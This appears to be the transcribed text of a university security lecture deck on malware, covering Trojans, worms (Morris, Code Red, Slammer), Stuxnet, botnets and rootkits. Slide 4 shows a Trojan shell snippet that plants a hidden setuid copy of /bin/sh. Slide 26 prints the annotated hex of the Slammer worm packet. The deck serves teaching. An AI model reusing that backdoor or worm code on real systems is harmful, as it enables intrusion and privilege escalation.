Food Chain and Food Web (Ecosystem) EVS, B. Pharmacy 1st Year, Sem-IIFood Chain and Food Web (Ecosystem) EVS, B. Pharmacy 1st Year, Sem-II
Food Chain and Food Web (Ecosystem) EVS, B. Pharmacy 1st Year, Sem-II
 
Role Of Transgenic Animal In Target Validation-1.pptx
Role Of Transgenic Animal In Target Validation-1.pptxRole Of Transgenic Animal In Target Validation-1.pptx
Role Of Transgenic Animal In Target Validation-1.pptx
 

virusessssßsssssssssssssssssssssssssssssssss.ppt

  • 1. CS526 1 Information Security CS 526 Topic 9 Malwares Topic 9: Malware
  • 2. CS526 Topic 9: Malware 2 Readings for This Lecture • Wikipedia • Malware • Computer Virus • Botnet • Rootkit • Morris Worm
  • 3. Malware Features & Types • Infectious: – Viruses, worms • Concealment: – Trojan horses, logic bombs, rootkits • Malware for stealing information: – Spyware, keyloggers, screen scrapers • Malware for profit: – Dialers, scarewares, ransomware • Malware as platform for other attacks – Botnets, backdoors (trapdoors) • Many malwares have characteristics of multiple types CS526 Topic 9: Malware 3
  • 4. CS526 Topic 9: Malware 4 Trojan Horse Example: Attacker: Place the following file cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm ./ls ls $* as /homes/victim/ls • Victim ls • Software that appears to perform a desirable function for the user prior to run or install, but (perhaps in addition to the expected function) steals information or harms the system. • User tricked into executing Trojan horse – Expects (and sees) overt and expected behavior – Covertly perform malicious acts with user’s authorization
  • 5. CS526 Topic 9: Malware 5 Trapdoor or Backdoor • Secret entry point into a system – Specific user identifier or password that circumvents normal security procedures. • Commonly used by developers – Could be included in a compiler.
  • 6. CS526 Topic 9: Malware 6 Logic Bomb • Embedded in legitimate programs • Activated when specified conditions met – E.g., presence/absence of some file; Particular date/time or particular user • When triggered, typically damages system – Modify/delete files/disks
  • 7. Example of Logic Bomb • In 1982, the Trans-Siberian Pipeline incident occurred. A KGB operative was to steal the plans for a sophisticated control system and its software from a Canadian firm, for use on their Siberian pipeline. The CIA was tipped off by documents in the Farewell Dossier and had the company insert a logic bomb in the program for sabotage purposes. This eventually resulted in “the most monumental non-nuclear explosion and fire ever seen from space”. CS526 Topic 9: Malware 7
  • 8. Spyware • Malware that collects little bits of information at a time about users without their knowledge – Keyloggers: stealthly tracking and logging key strokes – Screen scrapers: stealthly reading data from a computer display – May also tracking browsing habit – May also re-direct browsing and display ads CS526 Topic 9: Malware 8
  • 9. Scareware • Malware that scares victims into take actions that ultimately end up compromising our own security. – E.g., paying for and installing fake anti-virus products CS526 Topic 9: Malware 9
  • 10. CS526 Topic 9: Malware 10
  • 11. Ransomware • Holds a computer system, or the data it contains, hostage against its user by demanding a ransom. – Disable an essential system service or lock the display at system startup – Encrypt some of the user's personal files, originally referred to as cryptoviruses, cryptotrojans or cryptoworms • Victim user has to – enter a code obtainable only after wiring payment to the attacker or sending an SMS message – buy a decryption or removal tool CS526 Topic 9: Malware 11
  • 12. CS526 Topic 9: Malware 12 Virus • Attach itself to a host (often a program) and replicate itself • Self-replicating code – Self-replicating Trojan horses – Alters normal code with “infected” version • Operates when infected code executed If spread condition then For target files if not infected then alter to include virus Perform malicious action Execute normal program
  • 13. CS526 Topic 9: Malware 13 Worm • Self-replicating malware that does not require a host program • Propagates a fully working version of itself to other machines • Carries a payload performing hidden tasks – Backdoors, spam relays, DDoS agents; … • Phases – Probing  Exploitation  Replication  Payload
  • 14. General Worm Trends • Speed of spreading – Slow to fast to stealthy • Vector of infection – Single to varied – Exploiting software vulnerabilities to exploiting human vulnerabilities • Payloads – From “no malicious payloads beyond spreading” to botnets, spywares, and physical systems CS526 Topic 9: Malware 14
  • 15. CS526 Topic 9: Malware 15 Morris Worm (November 1988) • First major worm • Written by Robert Morris – Son of former chief scientist of NSA’s National Computer Security Center What comes next: 1 11 21 1211 111221?
  • 16. CS526 Topic 9: Malware 16 Morris Worm Description • Two parts – Main program to spread worm • look for other machines that could be infected • try to find ways of infiltrating these machines – Vector program (99 lines of C) • compiled and run on the infected machines • transferred main program to continue attack
  • 17. CS526 Topic 9: Malware 17 Vector 1: Debug feature of sendmail • Sendmail – Listens on port 25 (SMTP port) – Some systems back then compiled it with DEBUG option on • Debug feature gives – The ability to send a shell script and execute on the host
  • 18. CS526 Topic 9: Malware 18 Vector 2: Exploiting fingerd • What does finger do? • Finger output arthur.cs.purdue.edu% finger ninghui Login name: ninghui In real life: Ninghui Li Directory: /homes/ninghui Shell: /bin/csh Since Sep 28 14:36:12 on pts/15 from csdhcp-120-173 (9 seconds idle) New mail received Tue Sep 28 14:36:04 2010; unread since Tue Sep 28 14:36:05 2010 No Plan.
  • 19. CS526 Topic 9: Malware 19 Vector 2: Exploiting fingerd • Fingerd – Listen on port 79 • It uses the function gets – Fingerd expects an input string – Worm writes long string to internal 512-byte buffer • Overrides return address to jump to shell code
  • 20. CS526 Topic 9: Malware 20 Vector 3: Exploiting Trust in Remote Login • Remote login on UNIX – rlogin, rsh • Trusting mechanism – Trusted machines have the same user accounts – Users from trusted machines do not need to enter passwords – /etc/host.equiv – system wide trusted hosts file – /.rhosts and ~/.rhosts – users’ trusted hosts file Host aaa.xyz.com /etc/host.equiv bbb.xyz.com Host bbb.xyz.com User alice rlogin
  • 21. CS526 Topic 9: Malware 21 Vector 3: Exploiting Trust in Remote Login • Worm exploited trust information – Examining trusted hosts files – Assume reciprocal trust • If X trusts Y, then maybe Y trusts X • Password cracking – Worm coming in through fingerd was running as daemon (not root) so needed to break into accounts to use .rhosts feature – Read /etc/passwd, used ~400 common password strings & local dictionary to do a dictionary attack
  • 22. CS526 Topic 9: Malware 22 Other Features of The Worm • Self-hiding – Program is shown as 'sh' when ps – Files didn’t show up in ls • Find targets using several mechanisms: • 'netstat -r -n‘, /etc/hosts, … • Compromise multiple hosts in parallel – When worm successfully connects, forks a child to continue the infection while the parent keeps trying new hosts • Worm has no malicious payload • Where does the damage come from?
  • 23. Damage • One host may be repeatedly compromised • Supposedly designed to gauge the size of the Internet • The following bug made it more damaging. – Asks a host whether it is compromised; however, even if it answers yes, still compromise it with probability 1/8. CS526 Topic 9: Malware 23
  • 24. CS526 Topic 9: Malware 24 Increasing propagation speed • Code Red, July 2001 – Affects Microsoft Index Server 2.0, – Exploits known buffer overflow in Idq.dll – Vulnerable population (360,000 servers) infected in 14 hours • SQL Slammer, January 2003 – Affects in Microsoft SQL 2000 – Exploits known months ahead of worm outbreak • Buffer overflow vulnerability reported in June 2002 • Patched released in July 2002 (Bulletin MS02-39) – Vulnerable population infected in less than 10 minutes
  • 25. CS526 Topic 9: Malware 25 Slammer Worms (Jan., 2003) SQL Server 2000 SQLSERVR.EXE • MS SQL Server 2000 receives a request of the worm – SQLSERVR.EXE process listens on UDP Port 1434
  • 26. CS526 Topic 9: Malware 26 0000: 4500 0194 b6db 0000 6d11 2e2d 89e5 0a9c E...¶Û..m..-.å.. 0010: cb08 07c7 1052 059a 0180 bda8 0401 0101 Ë..Ç.R....½¨.... 0020: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0030: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0040: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0050: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0060: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0070: 0101 0101 0101 0101 0101 0101 01dc c9b0 .............ÜÉ° 0080: 42eb 0e01 0101 0101 0101 70ae 4201 70ae Bë........p®B.p® 0090: 4290 9090 9090 9090 9068 dcc9 b042 b801 B........hÜÉ°B¸. 00a0: 0101 0131 c9b1 1850 e2fd 3501 0101 0550 ...1ɱ.Pâý5....P 00b0: 89e5 5168 2e64 6c6c 6865 6c33 3268 6b65 .åQh.dllhel32hke 00c0: 726e 5168 6f75 6e74 6869 636b 4368 4765 rnQhounthickChGe 00d0: 7454 66b9 6c6c 5168 3332 2e64 6877 7332 tTf¹llQh32.dhws2 00e0: 5f66 b965 7451 6873 6f63 6b66 b974 6f51 _f¹etQhsockf¹toQ 00f0: 6873 656e 64be 1810 ae42 8d45 d450 ff16 hsend¾..®B.EÔP.. 0100: 508d 45e0 508d 45f0 50ff 1650 be10 10ae P.EàP.EðP..P¾..® 0110: 428b 1e8b 033d 558b ec51 7405 be1c 10ae B....=U.ìQt.¾..® 0120: 42ff 16ff d031 c951 5150 81f1 0301 049b B...Ð1ÉQQP.ñ.... 0130: 81f1 0101 0101 518d 45cc 508b 45c0 50ff .ñ....Q.EÌP.EÀP. 0140: 166a 116a 026a 02ff d050 8d45 c450 8b45 .j.j.j..ÐP.EÄP.E 0150: c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45 ÀP...Æ.Û..óa...E 0160: b48d 0c40 8d14 88c1 e204 01c2 c1e2 0829 ´..@...Áâ..ÂÁâ.) 0170: c28d 0490 01d8 8945 b46a 108d 45b0 5031 Â....Ø.E´j..E°P1 0180: c951 6681 f178 0151 8d45 0350 8b45 ac50 ÉQf.ñx.Q.E.P.E¬P 0190: ffd6 ebca .ÖëÊ The 0x01 characters overflow the buffer and spill into the stack right up to the return address This value overwrites the return address and points it to a location in sqlsort.dll which effectively calls a jump to %esp UDP packet header This byte signals the SQL Server to store the contents of the packet in the buffer Restore payload, set up socket structure, and get the seed for the random number generator Main loop of Slammer: generate new random IP address, push arguments onto stack, call send method, loop around NOP slide This is the first instruction to get executed. It jumps control to here. Slammer’s code is 376 bytes!
  • 27. CS526 Topic 9: Malware 27 Research Worms • Warhol Worms – Could infect all vulnerable hosts in 15 minutes – 1 hour – Uses optimized scanning in three phases • Phase 1: initial hit list of potentially vulnerable hosts • Phase 2: local subnet scanning • Phase 3: permutation scanning for complete, self-coordinated coverage, all instances pick a random host as starting target and follow up with hosts in a particular order (the same order for all instances); if a target host is already compromised, pick another random host • Flash Worms – Could infect all vulnerable hosts in 30 seconds – Determines a complete hit list of servers with relevant service open and include it with the worm
  • 28. CS526 Topic 9: Malware 28 Email Worms: Spreading as Email Attachments • Love Bug worm (ILOVEYOU worm) (2000): – May 3, 2000: 5.5 to 10 billion dollars in damage • MyDoom worm (2004) – First identified in 26 January 2004: – On 1 February 2004, about 1 million computers infected with Mydoom begin a massive DDoS attack against the SCO group • Similar method use text messages on mobile phones
  • 29. Stuxnet: History (1) • 2009 June: Earliest Stuxnet seen – Does not use MS10-046 • Microsoft Security Bulletin MS10-046: Vulnerability in Windows Shell Could Allow Remote Code Execution – Does not have signed drivers • 2010 Jan: Stuxnet driver signed – With a valid certificate belonging to Realtek Semiconductors • 2010 June: Virusblokada reports W32.Stuxnet – Stuxnet use MS10-046 – Verisign revokes Realtek certificate • 2010 July: Eset identify new Stuxnet driver – With a valid certificate belonging to JMicron Technology Corp • 2010 July: Siemens report they are investigating malware SCADA systems – Verisign revokes JMicron certificate CS526 Topic 9: Malware 29
  • 30. History (2) • 2010 Aug: Microsoft issues MS10-046 – Patches windows shell shortcut vulnerability • 2010 Sept: Microsoft issues MS10-061 – Patches Printer Spooler Vulnerability • 2010 Sept: Iran nuclear plant hit by delay – Warm weather blamed – Measured temperatures were at historical averages • 2010 Oct: Iran arrest “spies” – Spies who attempted to sabotage the country's nuclear programme – Russian nuclear nuclear experts flee Iran CS526 Topic 9: Malware 30
  • 31. Scenario (3) • The malicious binaries need to be signed to avoid suspicion – Two digital certificates were compromised – High probability that the digital certificates/keys were physically stolen from the companies premises – Realtek and JMicron are in close proximity CS526 Topic 9: Malware 31
  • 32. Scenario (4) • Initial Infection – Stuxnet needed to be introduced to the targeted environment • Insider • Willing third party • Unwilling third party such as a contractor – Delivery method • USB drive • Windows Maintenance Laptop CS526 Topic 9: Malware 32
  • 33. Scenario (5) • Infection Spread – Look for Windows computer that program the PLC’s (Called Field PG) • The Field PG are typically not network • Spread the Infection on computers on the local LAN – Zero-day vulnerabilities – Two-year old vulnerability – Spread to all available USB drives – When a USB drive is connected to the Field PG, the Infection jumps to the Field PG • The “airgap” is thus breached CS526 Topic 9: Malware 33
  • 34. Scenario (6) • Target Infection – Look for Specific PLC • Running Step 7 Operating System – Change PLC code • Sabotage system • Hide modifications – Command and Control may not be possible • Due to the “airgap” • Functionality already embedded CS526 Topic 9: Malware 34
  • 35. Command & Control • Stuxnet contacts the command and control server – Test if can connect to: • www.windowsupdate.com • www.msn.com – On port 80 – Sends some basic information about the compromised computer to the attacker – www.mypremierfutbol.com – www.todaysfutbol.com – The two URLs above previously pointed to servers in Malaysia and Denmark CS526 Topic 9: Malware 35
  • 36. Command & Control (2) CS526 Topic 9: Malware 36
  • 37. Windows Rootkit Functionality • Stuxnet has the ability to hide copies of its files copied to removable drives • Stuxnet extracts Resource 201 as MrxNet.sys. – The driver is registered as a service creating the following registry entry: – HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesMRxNet”I magePath” = “%System%driversmrxnet.sys” – The driver file is a digitally signed with a legitimate Realtek digital certificate. – The driver then filters(hides) files that : • Files with a “.LNK” extension having a size of 4,171 bytes.• • Files named “~WTR[FOUR NUMBERS].TMP”, – whose size is between 4Kb and 8Mb; the sum of the four numbers, modulo 10 is null. For example, 4+1+3+2=10=0 mod 10 • Examples: – Copy of Copy of Copy of Copy of Shortcut to.lnk – Copy of Shortcut to.lnk – ~wtr4141.tmp CS526 Topic 9: Malware 37
  • 38. Propagation Methods: Network • Peer-to-peer communication and updates • Infecting WinCC machines via a hardcoded database server password • Propagating through network shares • Propagating through the MS10-061 Print Spooler Zero-Day Vulnerability • Propagating through the MS08-067 Windows Server Service Vulnerability CS526 Topic 9: Malware 38
  • 39. Propagation Methods: USB • LNK Vulnerability (CVE-2010-2568) • AutoRun.Inf CS526 Topic 9: Malware 39
  • 40. What was the target? • Bushehr Nuclear Plant in Iran – 60% Infections in Iran – No other commercial gain – Stuxnet complexity – Stuxnet self destruct date – Siemens specific PLC’s CS526 Topic 9: Malware 40
  • 41. Conclusion • Stuxnet represents the first of many milestones in malicious code history – It is the first to exploit multiple 0-day vulnerabilities, – Compromise two digital certificates, – And inject code into industrial control systems – and hide the code from the operator. • Stuxnet is of such great complexity – Requiring significant resources to develop – That few attackers will be capable of producing a similar threat • Stuxnet has highlighted direct-attack attempts on critical infrastructure are possible and not just theory or movie plotlines. CS526 Topic 9: Malware 41
  • 42. CS526 Topic 9: Malware 46 Zombie & Botnet • Secretly takes over another networked computer by exploiting software flows • Builds the compromised computers into a zombie network or botnet – a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. • Uses it to indirectly launch attacks – E.g., DDoS, phishing, spamming, cracking
  • 43. CS526 Topic 9: Malware 47 Rootkit • A rootkit is software that enables continued privileged access to a computer while actively hiding its presence from administrators by subverting standard operating system functionality or other applications. • Emphasis is on hiding information from administrators’ view, so that malware is not detected – E.g., hiding processes, files, opened network connections, etc • Example: Sony BMG copy protection rootkit scandal – In 2005, Sony BMG included Extended Copy Protection on music CDs, which are automatically installed on Windows on CDs are played.
  • 44. Types of Rootkits • User-level rootkits – Replace utilities such as ps, ls, ifconfig, etc – Replace key libraries – Detectable by utilities like tripwire • Kernel-level rootkits – Replace or hook key kernel functions – Through, e.g., loadable kernel modules or direct kernel memory access – A common detection strategy: compare the view obtained by enumerating kernel data structures with that obtained by the API interface – Can be defended by kernel-driver signing (required by 64-bit windows) CS526 Topic 9: Malware 48
  • 45. CS526 Topic 9: Malware 50 How does a computer get infected with malware or being intruded? • Executes malicious code via user actions (email attachment, download and execute trojan horses, or inserting USB drives) • Buggy programs accept malicious input – daemon programs that receive network traffic – client programs (e.g., web browser, mail client) that receive input data from network – Programs Read malicious files with buggy file reader program • Configuration errors (e.g., weak passwords, guest accounts, DEBUG options, etc) • Physical access to computer
  • 46. CS526 51 Coming Attractions … • Web Security Topic 9: Malware